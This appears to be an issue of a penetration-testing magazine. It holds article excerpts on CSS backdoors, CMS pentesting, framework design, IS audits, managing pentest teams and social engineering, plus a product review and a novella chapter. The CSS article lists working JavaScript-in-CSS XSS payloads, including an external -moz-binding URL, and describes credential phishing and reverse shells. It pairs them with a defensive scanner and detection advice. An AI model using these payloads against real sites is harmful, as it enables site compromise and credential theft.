CMS Pentesting WebApp Pentesting





EDITOR’S NOTE

Hello Everyone!

Here it is! Next issue of your favorite Web App Pentesting. This was a tough part but done with satisfaction. And now you have it ready for reading and commenting. So let’s see what we have prepared for you. This issue goes with three sections and the next chapter of your favorite cyber crime novel – Cyber Styletto – by Mike Brennan and Richard Stiennon; the gentlemen continue the story with chapter 5.

Firstly, we go with the most important Web App section, where you find three articles. Hans-Michael Varbaek will reveal to us dangerous secrets that could be hidden behind CSS in the article Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets. After reading you really can be more aware of security on web pages and avoiding problems. The next article, How to pentest well-known CMS, by Sumedt Jitpukdebodin, gives us a view on how to manage easily a webpage with CMS and make it simple and safe. It’s surely worth reading. Web App section ends with Daniel Molina Wegener’s article titled Frameworks and Good Design Implementation. He teaches us to choose which framework we should use and what to do to make it even better.

Next we go with section Close-Up. In the article entitled Why an Automated Vulnerability Assessment is not Enough, Ahmad Taha Zaki presents the most popular techniques that help in pen-testing and proves that basic methods are not enough. He puts a new light on using and abusing well-known methods. Close-up is completed with Peter Hu’s Managing a Successful Penetration Testing Team. He shares with readers all sorts of misunderstanding people get when they hear about pentesters. You will get four precious tips how to become a good manager of pentesting team.

In the Social Engineering section you will find Shane MacDougall’s article Social Engineering Engagements. The author reminds us how dangerous it can be if used in inappropriate way. So it’s good to know how to handle it.

We hope you will enjoy reading this as we enjoy making it. Enjoy reading!

Adam Robakiewicz & PenTest Team

04/2012(6)

CONTENTS

WEB APP

Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets
by Hans-Michael Varbaek

When a website gets compromised, a new file is often created by the attacker, where he or she can sometimes do almost the same on the system as any other user. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads. So it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

How to pentest well-known CMS
by Sumedt Jitpukdebodin

Today, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look and page structure, with different colors; the only difference is the logo of the website. All of these websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, customize the theme, administer the website, manage users, etc.

Frameworks and Good Design Implementation
by Daniel Molina Wegener

A framework is more than a library. We can state that a framework defines a common approach to solve problems using software abstractions with reusable generic functionalities. There are some considerations regarding which framework should be used to reach the optimal solution. We can use any framework that we want, but we must think about some elements that make some frameworks better than others while we are designing our application.

CLOSE-UP

Why an Automated Vulnerability Assessment is not Enough
by Ahmad Taha Zaki

For the last few years, a concept has grown within the Information Technology (IT) field that conducting an automated vulnerability assessment, maybe followed by a penetration test, is enough to determine and validate vulnerabilities within an information system (IS), thus considering these processes as a full security assessment. In the following lines we will explain the process of an IS Audit and why it is important to be performed side by side with vulnerability assessment and penetration testing.

Managing a Successful Penetration Testing Team
by Peter Hu

“You Pentesters are crazy!” Believe it or not, there are numerous negative perceptions surrounding penetration testing teams. Penetration testers have long had a bad reputation; they are viewed as techno-geeks, out of touch with the real world and misaligned from real business goals. I hear such complaints on a constant basis.

SOCIAL ENGINEERING

Social Engineering Engagements
by Shane MacDougall

After years of being neglected, social engineering is finally coming into its own, as companies (and auditors) realize the impact of the threat, and more important, how frequently it is being successfully used by attackers. As a result, more of these engagements are starting to appear on our plates.

REVIEW

SecPoint Penetrator Review
by Jimmy Halfpenny

Vulnerability assessment should be a key part of your information security program. It’s important to keep up to date with the ever-changing attack surface your network presents and automated scanning can help you keep on top of it. This week I’ve been looking at the Penetrator vulnerability assessment appliance from Secpoint (http://www.secpoint.com/penetrator.html) which offers a simple, straightforward way to scan your systems for remote vulnerabilities.

CYBER STYLETTO

Cyber crime novella- Cyber Styletto – Chapter 5
by Mike Brennan and Richard Stiennon

Cyber crime novella- Cyber Styletto – Chapter 4

TEAM

Editor: Paulina Płocha paulina.plocha@software.com.pl
Betatesters: Denis Distler, Felipe Martins, Rishi Narang, Johan Snyman, Edison Josue Diaz, Aby Rao, Hugo Lujan
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl
Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType™

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

http://pentestmag.com


WEB APP

CSS Backdoors

Hiding Malicious Payloads Inside Cascading Style Sheets

When a website gets compromised, a new file is often created by the attacker, where he or she can sometimes do almost the same on the system as any other user. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads.

So it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

Some time ago, I discovered a couple of persistent (stored) Cross-Site Scripting vulnerabilities in vBulletin [1] [2], where the first was simply found with standard research but also a bit of luck [4] [5], while RSnake’s XSS Cheatsheet [3] was used to aid me in bypassing the custom Anti-XSS filter inside vBulletin. All of this was great, but as I dived deeper into executing JavaScript via CSS (Cascading Style Sheets), I realized at that time that attackers, such as knowledgeable script kiddies or black hats, could hide a JavaScript payload in one of the CSS files. vBulletin uses, e.g., over 100 CSS files for each style, and if the CSS changes are stored only inside the database, an unaware administrator may not realize his or her installation of vBulletin has been compromised, as they may be unaware that backdoors can hide in CSS.

Figure 1. Screenshot of JavaScript execution inside a CSS file on vBulletin

How to execute JavaScript in CSS

Firstly, it’s important to know how it is possible to even execute JavaScript inside the templates or files, which are essentially the same as they are loaded with the HTML page. There are of course limitations to these backdoors, as the page may not load the entire CSS library at once and therefore, the most appropriate CSS file for infection must be chosen. But how is it possible? (Check Listing 1) In fact, I’m not even sure that I’ve collected most of the known possible ways, but after reading through RSnake’s XSS Cheatsheet [3], and while searching through the Internet, I came up with a nice list as seen in Listing 2. As you can see, these are just some of the ways, where most, if not all of them, are mentioned at RSnake’s website. With HTML5 and CSS3, where the latter is the most important in this case, new vectors enabling JavaScript will most likely be possible.

Listing 1. One of many ways to execute JavaScript in CSS

    width:expression(alert(String.fromCharCode(73,110,116,101,114,78,48,84)))

Listing 2. A few examples of how JavaScript execution is possible in CSS files

    - -moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss"); // See ha.ckers.org
    - url(vbscript:msgbox("X/SS"));
    - behavior:url(); // See ha.ckers.org for more information
    - background:url();
    - width:expression();
    - @import'vb\script:alert(document.domain); // IE6
    - @\!'javascript:alert(/IE6/)'; //IE6

What’s possible with Cross-Site Scripting?

Only your imagination sets the limits, and of course the capabilities of your browser, the target web application, and your patience. It is possible to even scan your internal network [7], but also, in some cases without being a privileged user, escalate privileges to remote code execution [6].

The last is particularly interesting, as the payload abuses the web application functionality that the administrator has access to, and thereby injects a PHP plugin, which returns a backdoor shell to the attacker. In the same way, it is possible to inject this JavaScript payload into CSS files. But let’s say the attacker already has remote code execution but needs a backdoor or wants to know the password of the users. In this case, the attacker can simply use JavaScript to redirect the HTTP-flow of the web application to a phishing page and back again with some clever dynamic editing of the HTML Form Input, which quite often uses CSS too, meaning this is an ideal place to inject a backdoor for an attacker. Another backdoor could simply be session riding the hijacked victims and, e.g., performing actions on their behalf without them knowing it happened before it’s too late. As the CSS follows the user almost everywhere on the site, in case it is, e.g., injected into the header, the impact of the malware aka payload in the CSS files can be quite fatal for a website.

Figure 2. Reverse TCP Connection was made from the webserver to the attacker

Figure 3. Redirecting the user to a browser exploit with JavaScript inside CSS

References

[1] http://forum.intern0t.org/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
[2] http://forum.intern0t.org/intern0t-advisories/3398-vbulletin-4-0-8-pl1-cross-site-scripting-filter-bypass-within-profile-customization.html
[3] http://ha.ckers.org/xss.html
[4] http://www.exploit-db.com/vbulletin-a-journey-into-0day-exploitation/
[5] http://www.youtube.com/watch?v=LOcLFVAqgOU
[6] http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
[7] http://www.businessinfo.co.uk/labs/css_lan_scan/css_lan_scanner.php

How do you find these backdoors, or know they’re there?

This is the big question, but the easiest way is simply to look with a simple regular expression tool that searches for, e.g., occurrences of width:expression. Keep in mind that some legitimate web applications actually use JavaScript in their CSS files already. So don’t delete anything unnecessarily unless you want a broken style on your website (vBulletin is one of these applications). On Linux you can use something as simple as ‘grep’, and on Windows there’s a nice program called WinGrep that even has a GUI to make everything a bit easier. The problem with backdoors in CSS files is that some web applications such as vBulletin have around 750’000 letters of CSS, and it is quite challenging to keep focus while reading through that. If your web application only uses static CSS files that are not stored in a database, then simply doing a “diff” (differentiate) of the original and the latest backup can often reveal many interesting things in case an attack has occurred. Of course, if the hacker managed to “rm -rf” (delete) everything, this is not possible, but then you could, for example, change the ownership of the files to root, make only root able to write to these files, and even write-protect them with ‘chattr’. If you change the owner to root, make sure the guests visiting the website have the right (chmod) permissions to access the files.
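A sketch of the search-and-diff approach described above, added here as an example (it is not the author's code): it goes beyond a plain search for width:expression by looking for the script-capable constructs from Listings 1 and 2 after removing comments and decoding backslash escapes such as the `vb\script` form in Listing 2, and it reports only hits that are absent from a known-good copy. The function names and both sample stylesheets are constructed for illustration.

```python
import re

# Script-capable CSS constructs named in the article's Listings 1 and 2.
PATTERNS = [
    ("expression()", re.compile(r"expression\s*\(")),
    ("behavior:url()", re.compile(r"behavior\s*:\s*url\s*\(")),
    ("-moz-binding", re.compile(r"-moz-binding\s*:")),
    ("script-scheme URL", re.compile(r"(?:javascript|vbscript)\s*:")),
]

# One token per match: a whole comment, a hex escape, a single-character
# escape, or any other character.
TOKEN = re.compile(
    r"/\*.*?\*/|\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\([^\r\n])|.", re.DOTALL
)


def normalize(css):
    """Return (text, line_of): css lowercased with comments removed and backslash
    escapes decoded, plus the 1-based source line of every character in text."""
    out, line_of, line = [], [], 1
    for tok in TOKEN.finditer(css):
        raw = tok.group(0)
        if raw.startswith("/*"):
            piece = ""  # commented-out text never reaches the matcher
        elif tok.group(1):
            cp = int(tok.group(1), 16)
            piece = chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        elif tok.group(2):
            piece = tok.group(2)  # "\s" in "vb\script" becomes "s"
        else:
            piece = raw
        piece = piece.lower()
        out.append(piece)
        line_of.extend([line] * len(piece))
        line += raw.count("\n")
    return "".join(out), line_of


def scan(css):
    """Return sorted (line, label, source_line) for each suspicious construct."""
    text, line_of = normalize(css)
    source = css.split("\n")
    hits = set()
    for label, pattern in PATTERNS:
        for match in pattern.finditer(text):
            line = line_of[match.start()]
            hits.add((line, label, source[line - 1].strip()))
    return sorted(hits)


def new_findings(baseline_css, current_css):
    """Findings in current_css whose (label, line text) is not in the known-good
    copy, so scripted CSS the application ships with is not reported again."""
    def key(hit):
        return hit[1], " ".join(hit[2].split())

    known = {key(hit) for hit in scan(baseline_css)}
    return [hit for hit in scan(current_css) if key(hit) not in known]


# Constructed known-good stylesheet: it legitimately uses expression(), as the
# article notes some applications do.
BASELINE_CSS = r"""/* old IE shim, replaces behavior:url(fix.htc) */
.wrap { width: expression(document.body.clientWidth > 980 ? "980px" : "auto"); }
.postbit { color: #333; }
"""

# Constructed current copy: the baseline plus two entries taken from the
# article's Listings 2 and 1.
CURRENT_CSS = BASELINE_CSS + r"""@import 'vb\script:alert(document.domain)';
.sig { width:expression(alert(String.fromCharCode(73,110,116,101,114,78,48,84))) }
"""

if __name__ == "__main__":
    for line, label, src in new_findings(BASELINE_CSS, CURRENT_CSS):
        print(f"line {line}: {label}: {src}")
```

For CSS stored in a database, as with vBulletin, the same functions can be run over the exported template text instead of files.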

We haven’t seen it on a wide scale yet, so why discuss this issue?

It’s important to be aware of the tricks black hats may think of using or are using but the public may not generally know about. It’s impossible to tell how many times this method may have been used already, but it is one of the more stealthy ways. The attacker doesn’t need to put a huge payload in the CSS files, but can instead load an external CSS file, or use several variables across a 5’000-line style sheet to create a payload that phishes the login credentials, and that is even if the attacker hasn’t changed the actual HTML form, because with dynamic JavaScript it is possible to change an HTML page after it has been loaded.

With these drive-by aka exploit kit injections happening widely on a periodic basis, using simple <iframe> injections, they could easily turn into an extra CSS entry that looks harmless and may not execute the malicious payload all of the time, and thereby stay hidden for a much longer time. After all, when you check if a website has been compromised, the first thing most would check is the HTML source. If it looks clean, one would most likely move on. But a backdoor could be hiding in those 5k lines of CSS somewhere. Since time is precious, most skip this part as it is “unlikely” for backdoors to exist there, at least from some points of view. The most important thing when assessing the state of a web application is to go through everything.

HANSMICHAEL

Figure 4. Demonstration of an old vulnerability in conjunction with the redirection attack

Hans-Michael Varbaek has been in the hacking community for a little over 10 years, though with shorter and longer breaks from time to time. He has mostly worked within Technical Support, abroad in both Sweden and Ireland, but has also worked as a freelance penetration tester, where most of his work has been voluntary. He administrates the InterN0T site and community, �nds 0days and writes advisories for fun but no pro�t whenever there’s time and blogs at The Exploit Database on rare occasion. Currently he’s sorting out the last things before moving to Australia, while sharing his knowledge and ideas with the community whenever possible.

04/2012(6)

Page 8

http://pentestmag.com




WEB APP

How to pentest well-known CMS

Today, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look and page structure, with different colors; the only difference is the logo of the website.

All of these websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, customize the theme, administer the website, manage users, etc. Even if the web master does not understand anything about web programming, he can still create a beautiful website because the CMS is managed via a web interface. The web master can add a new feature to the CMS by installing a new plugin. A web master just has to click, click and click, then voilà! The new website has been created. The coin has 2 sides: the bad side is that if someone can find a vulnerability in the core of the CMS or in a well-known plugin, he can then hack all websites that use the vulnerable CMS or vulnerable plugin too. In this article, I will discuss how to pentest 3 well-known CMS: Joomla, Drupal and WordPress. This tutorial will show you how to get the information for the common CMS websites and how to pentest them.

Figure 1. Example administrator page of Joomla (http://192.168.253.128/1/administrator/)

Figure 2. Example administrator page of WordPress (http://192.168.253.128/3/wp-login.php)

Identify the web

The first thing we must know before pentesting the website is which CMS was used, because each CMS has different default files and structure. All these differences create the signature of each CMS. We can analyze the target website with the following 2 methods.

By manual testing

Normally, when a user has finished installing a CMS, he often forgets to remove unnecessary files from the website. Those files will be the signature of the CMS, and default configurations will let us know what CMS was used.



WEB APP

Frameworks and Good Design Implementation

A framework is more than a library. We can state that a framework defines a common approach to solve problems using software abstractions with reusable generic functionalities. There are some considerations regarding which framework should be used to reach the optimal solution.

We can use any framework that we want, but we must think about some elements that make some frameworks better than others while we are designing our application. From this perspective, a framework will reduce your development timeline, but not entirely; it still requires good work, and good work requires time and effort. You can find many solutions in a framework, like input validation and message processing, but it still requires a good architecture implementation. A framework itself is not enough to cover a development. It requires a good application design, thinking about scalable applications from the start. We must think about application designs that can scale easily; we can cover that requirement using the proper architectural patterns and design patterns. Any class provided by the framework should not be used as is; we must plug each class into a design pattern properly, to make it fit a good architecture. We should have in mind a few questions about the framework that we will start using, as follows:

• What is the predefined architectural pattern that covers the framework?
• How easy is it to extend that pattern to other patterns to cover abstractions?
• Is it easy to integrate it with third party technologies like Message Queues and Job Queues?
• Does it support a wide variety of data formats to expose application data, like REST, XML and JSON?
• Can we scale the application using this framework?
• Can we plug in third party APIs, like OAuth authenticated APIs?

Also we should ask “How much do you think the application will grow?” And then we can start thinking about the main architectural pattern that should be used, where an architectural pattern is defined in terms of components, like the Model View Controller pattern and the Presentation Abstraction Control pattern. On small applications, patterns like MVC should be preferred, but on larger applications, patterns like PAC should be our first preference, due to its flexible design. On the PAC pattern we have the option of layering the application, allowing more complex design patterns to be included in it, where a design pattern is defined in terms of classes. The PAC pattern allows layering applications, which is very important on larger applications. If the application grows, its design can be migrated easily to distributed computing components, like services APIs, Message Queues, Job Queues and similar stuff. If you do not have a well defined structure, using the proper layers, it will be harder to refactor your application to make it grow faster, increasing the project development



CLOSE-UP

Why an Automated Vulnerability Assessment is not Enough

For the last few years, a concept has grown within the Information Technology (IT) field that conducting an automated vulnerability assessment, maybe followed by a penetration test, is enough to determine and validate vulnerabilities within an information system (IS), thus considering these processes as a full security assessment. In the following lines we will explain the process of an IS Audit and why it is important to be performed side by side with vulnerability assessment and penetration testing.

Although an IS audit usually depends upon a certain checklist, it incorporates the use of various systems’ reports, the user interface, and sometimes, with respect to the experience of the auditor, the business logic and the need-to-know principle. An assessment including only automated vulnerability assessment and penetration testing can detect weak passwords but can’t inform us whether the account holder needs the rights she currently has or not; it can detect un-patched services but can’t inform us whether these services are authorized to be there in the first place or not; it can detect misconfiguration of some firewall rules, but can’t inform us about its correct complete rule set. So what we really need is a holistic approach that can detect/validate vulnerabilities and also determine whether or not this very specific system complies with the entity’s information security policy. In this case an IS audit needs to be added to our set of activities to perform a complete security assessment.

We won’t be discussing vulnerability assessment and penetration testing within the rest of this article; we will rather focus upon the IS audit process.

Let’s start describing the IS Audit process from the very beginning: it is the process of collecting and evaluating evidence to determine whether a computer system (information system) safeguards assets, maintains data integrity, achieves organizational goals effectively and consumes resources efficiently [1]. It also provides management with a proper validation of the effectiveness of current controls of an IS. Any information system can be modeled into four functional parts: Input, Processing, Output and Storage (IPO+S), as shown in Figure 1. Any organization’s management should manage to have efficient controls in place with regard to each part of this functional model.

Figure 1. Information System Functional Model


CLOSE-UP

Managing a Successful Penetration Testing Team

A Five Minutes Crash Course

“You Pentesters are crazy!” Believe it or not, there are numerous negative perceptions surrounding penetration testing teams. Penetration testers have long had a bad reputation; they are viewed as techno-geeks, out of touch with the real world and misaligned from real business goals. I hear such complaints on a constant basis.

Unfortunately, in many cases the perception does become the reality for our customers. Instead of viewing penetration testers in a positive light, their sense of reality becomes overshadowed by their own negative perceptions. As someone with leadership responsibility for a penetration testing team, it is our job to positively alter that perception. There are numerous resources online, in books and classrooms on developing a penetration testing program, but I have not seen too many resources on how to become a manager of this program. In this article, I will share a few tips that I have learned through experience and, more importantly, through mentors that have guided me through the process of becoming a manager of a successful penetration testing team.

Like most new IT managers, my own promotion into the management position was not any different than a promotion in most other areas of information technology. The promotion was based more on my technical capabilities and accomplishments, with very little consideration for my actual business acumen. As a new manager of this incredibly technical program, I quickly became overwhelmed and started losing myself in mundane technical irregularities rather than focusing on being a manager. It was easy to overlook some of the basic business practices and lose focus when one does not take a step back and ask the following: What is the goal of this job? Who are the stakeholders? How do we add value? When new managers are dropped into leadership positions, I believe they really need a crash course to shift their concentration from a technical standpoint to a business value focus. Remember, business drives IT. Here are four tips that will surely help any manager regardless of experience.

Tip Number One

First and foremost, a manager must understand that the penetration testing team must add value. A manager needs to understand the customer’s business, and make every effort to learn what they do. Successful managers will be able to communicate to their customers in their language. For example, is the customer in the business of power generation? Or is it health care that they provide? Or is it the financial industry where time is money and money is time? Each business has its own unique requirements and lingoes; being able to understand what your customer is looking for from a business need point of view is very important. The ability to communicate their requirements and penetration testing in your customer’s language will add impact to your statement, allowing you to win trust, cooperation and respect.


SOCIAL ENGINEERING

Social Engineering Engagements

Beware of The Pitfalls

After years of being neglected, social engineering is finally coming into its own, as companies (and auditors) realize the impact of the threat, and more important, how frequently it is being successfully used by attackers. As a result, more of these engagements are starting to appear on our plates.

But it’s very important that auditors know exactly what they are getting into before they embark on a social engineering engagement, both to ensure the audit’s efficacy, as well as to prevent blowback from dissatisfied or angered clients. I was recently speaking with a colleague who had just come back from an engagement, and he ruefully recounted his client’s demand for a significant refund as a result of a social engineering gig that the auditor thought had gone well, but the client didn’t. What happened? Well, the auditor had run a well-known phishing tool, had several employees at the target company click on the supplied links, and had in turn installed (harmless) software on the “victim’s” machines. So why was the client unhappy? There were two issues: the client hadn’t been aware that software would be deployed on the machines (harmless or not), and the client didn’t believe that phishing was social engineering (a stance I actually agree with). Some simple ground rules set out prior to the engagement’s commencement would have helped avoid this ugly scene.

So today we will set out some points that every social engineering engagement manager should look for before embarking down that potentially pitfall-filled road. While this might seem pretty straightforward, I’m amazed at the number of times I’ve heard colleagues run into problems with this. The same people who judiciously mark out what’s fair game for a network penetration test somehow fail to apply the same standard to social engineering engagements.

Ground Rules

It’s critical that the client and auditor agree to some basic ground rules before the first phone call is made or phishing email is sent:

• What pretexts will be used?
• Who can be targeted?
• Can they be targeted at home?
• Can they be targeted online at non-work sites? (especially critical since I have had success in targeting individuals through dating sites – a potential minefield)
• What data will be targeted?
• Will on-site attacks be performed?
• Will phone attacks be used?
• Are vendors fair game?

Any social engineering pretext that has the potential to induce fear needs to be vetted before being used. If you are calling posing as a security team member, and are telling your target that there has been a breach and you need them to change their password, there’s a very high risk that your victim will tell others within the company about the incident. Imagine if your target



REVIEW

SecPoint Penetrator Review

Vulnerability assessment should be a key part of your information security program. It’s important to keep up to date with the ever-changing attack surface your network presents and automated scanning can help you keep on top of it. This week I’ve been looking at the Penetrator vulnerability assessment appliance from Secpoint (http://www.secpoint.com/penetrator.html) which offers a simple, straightforward way to scan your systems for remote vulnerabilities.

The Penetrator is available in several flavours, chiefly as a hardware appliance or as a VMware virtual machine. There’s also an option to buy the software-only product. Pricing is based on the number of IP addresses that can be scanned concurrently. The starting price for the appliance is $2,025.00 for an 8 concurrent IP address license and $675.00 for the VMware virtual appliance with 4 IP addresses. You can change addresses being scanned as often as you wish so it’s good for consultants with multiple customers or companies with a larger block of addresses to scan and smaller budgets. I’ve been looking at the Penetrator S600 which is good for 16 concurrent IP addresses.

SecPoint Penetrator Appliance

Once you plug in the appliance and power it on, the device is ready to go in a few minutes. Log in to the web interface with your browser and you’re presented with a dashboard showing some quick links to commonly used functionality, a list of the previous audit scans and the status of the appliance. The Penetrator has a database of over 54,000 remote vulnerabilities and security issues.

SecPoint Dashboard



CYBER STYLETTO

Cyber Styletto

4 p.m., Thursday, offices of Ryan Repo Services, San Francisco

Buck Ryan made boxcars full of money repossessing aircraft whose buyers were in default. The glamorous sounding business, though, meant spending hours in dark and dirty locations, waiting, watching and drinking gallons of bad coffee, poised for the right opportunity to move. So when it came to spending that money, Buck made up for the rough trips by making sure his accommodations back home were designed to be luxury that rivaled a sultan’s. His conference room in the Pyramid seated twenty at a table the size of a landing strip. The suite was all windows except for the interior walls, which were covered with photos of the planes Buck had snatched in his quarter century in business. Looking out, Yvonne took in views of the bay, the Golden Gate and the rest of the city.

“Impressive,” Yvonne said. “This is a nice upgrade from your last office.”

“Wish I spent more time here,” Buck said, “but the money’s out there.”

“This is like an aircraft archive,” Colin said as he perused the pictures. He stopped in front of a Nam-era F-4. “You fly this one too?”

“Flown them all. But the Phantom’s the only one I could do barrel rolls in,” Buck said.

They sat at the end of the table closest to the bridge, leaving vacant a space that resembled a small hangar. Yvonne looked into the cavernous area and asked, “Expecting more guests?”

“I’ve got that muscle you asked for,” Buck said, “but actually no one’s sat at the other end of the table since I can remember. Guess I got a little carried away with the decorating. But I’ve got to spend my money someplace.”

There was a barely audible knock at the door to the conference room. A shaved head poked in, apologized for the interruption and smiled. “Come on in, boys,” Buck said. The head and its owner had to turn a little sideways to get through the door. The man was his own jumbo jet, maybe six-seven and at least three hundred pounds. How he’d managed to knock so lightly was a mystery.



In the upcoming issue of the

Android Web Applications

Available to download on May 22nd

If you would like to contact the PenTest team, just send an email to maciej.kozuszek@software.com.pl or ewa.dudzic@software.com.pl. We will reply a.s.a.p. PenTest Magazine has the right to change the content of the next magazine edition.



